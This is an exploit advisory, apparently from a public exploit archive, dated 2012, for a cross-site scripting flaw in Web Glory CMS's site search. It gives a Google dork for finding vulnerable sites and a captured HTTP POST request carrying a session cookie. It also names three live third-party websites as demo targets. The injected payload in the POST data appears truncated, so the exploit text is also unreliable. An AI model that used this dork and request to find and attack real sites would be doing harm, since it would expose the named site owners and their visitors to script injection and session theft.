################################################################################### # Exploit Title: Web Glory CMS Cross Site Scripting Vulnerability # # Google Dork:intext:"Powered By Web Glory" # # Date: 08/24/2012 # # Author: Crim3R # # Vendor Home : http://www.webglory.pk/ # # Tested on: all # ################################################################################### $ $    ----Author will be not responsible for any damage---- $ ###################################################################################   ======================================== HTTP HEADERS /Host: www.zaindrbeauty.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Referer: http://www.zaindrbeauty.com/site_search.php Cookie: PHPSESSID=6aade8812609354e67318433711f5317 Content-Type: application/x-www-form-urlencoded Content-Length: 42 POST DATA-------------------------- txtsearch=">&Submit.x=0&Submit.y=0 D3M0 Sites : http://www.zaindrbeauty.com/site_search.php http://www.boroojmotorbike.com/site_search.php http://www.westlandcrafts.com/site_search.php ===============Crim3R@Att.Net=========== $home = %00 thanks to :  2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir